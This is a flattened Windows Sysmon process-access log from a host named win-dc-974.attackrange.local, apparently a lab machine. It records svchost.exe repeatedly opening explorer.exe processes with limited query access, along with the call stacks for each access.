16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:53.685{05ADC7E1-229F-6039-0D00-00000000AD01}6201004C:\Windows\system32\svchost.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 